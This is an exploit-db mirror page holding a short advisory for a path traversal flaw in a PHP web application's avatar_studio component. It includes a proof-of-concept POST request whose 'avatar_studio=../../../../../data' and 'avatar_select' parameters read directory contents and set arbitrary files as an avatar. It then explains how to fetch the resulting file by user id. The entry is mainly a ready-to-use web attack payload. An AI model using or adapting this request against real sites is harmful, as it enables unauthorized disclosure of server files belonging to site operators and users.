bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10808.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
748 B
Text
Raw Blame History

# Tested on: Spanish version
By modifying "avatar_studio" parameter at POST data at avatar_studio.php you can retrieve all images at that dir.
Also using "avatar_select" you can add yourself a file as avatar which may not be .jpg
Proof of concept:
POST /infusions/avatar_studio/avatar_studio.php HTTP/1.1
...
Headers
...
Content-Length: XX
avatar_studio=../../../../../data&avatar_select=data.txt&avatar_save=Salvar+Avatar <-- (Spanish: 'Save avatar')
If you are trying to access to a non-existent directory it would return a php error.
Else if your file does exist it will load as normal.
When you have modified your avatar you can access to it using your "user id" as:
http://www.xxxxxxxxxxxxx.com/images/avatars/avatar[YOURUSERID].EXTENSION
Reference in a new issue View git blame Copy permalink